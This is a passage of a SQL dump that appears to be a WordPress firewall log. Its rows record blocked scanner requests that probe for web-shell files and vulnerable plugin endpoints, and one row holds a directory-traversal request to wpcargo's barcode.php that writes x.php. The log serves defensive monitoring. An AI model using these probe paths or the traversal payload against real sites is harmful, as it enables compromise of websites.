User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10828,1673832937.466360,1673832936.679100,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10829,1673832935.834735,1673832935.154200,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10830,1673836477.008089,1673836476.894400,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10831,1673836474.294483,1673836474.164100,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10832,1673836454.673733,1673836454.540800,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10833,1673836442.603919,1673836442.462100,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10834,1673835899.112613,1673835898.939600,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/divi-contact-extended/includes/upload.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kaXZpLWNvbnRhY3QtZXh0ZW5kZWQvaW5jbHVkZXMvdXBsb2FkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10835,1673835898.139077,1673835898.000700,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/gatewayapi/inc/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nYXRld2F5YXBpL2luYy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10836,1673835897.798520,1673835897.684900,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/gatewayapi/inc/css_js.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nYXRld2F5YXBpL2luYy9jc3NfanMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10837,1673835896.619970,1673835896.493700,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXItcHJvL2xpYi9waHAvY29ubmVjdG9yLm1pbmltYWwucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10838,1673835895.634495,1673835895.515600,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10839,1673835894.952011,1673835894.759700,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQva2luZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10840,1673835892.762221,1673835892.653600,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/x.php?1=system','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQveC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10841,1673835892.083955,1673835891.963800,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=..%2F..%2F..%2Fx.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4veC5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGNhcmdvL2luY2x1ZGVzL2JhcmNvZGUucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(10842,1673835891.688646,1673835891.578000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FicnV6aS5waHA0\",\"category\":\"brute-force\",\"ssl\":1}'),(10843,1673835891.295114,1673835891.177100,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10844,1673835890.885359,1673835890.709700,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy90eXBlaHViL2N1c3RvbS9hNTdiemU4OTMxLy5fX2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10845,1673835890.462373,1673835890.298400,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/admin-ajax.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10846,1673835889.287505,1673835889.168900,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC9maWxlcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10847,1673835888.868142,1673835888.727700,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(10848,1673835887.882639,1673835887.761100,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10849,1673835886.422144,1673835886.274600,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/upload.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvdXBsb2FkLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10850,1673835884.587374,1673835884.422300,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10851,1673835882.916044,1673835882.773300,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/apikey.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10852,1673835881.387586,1673835881.277400,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 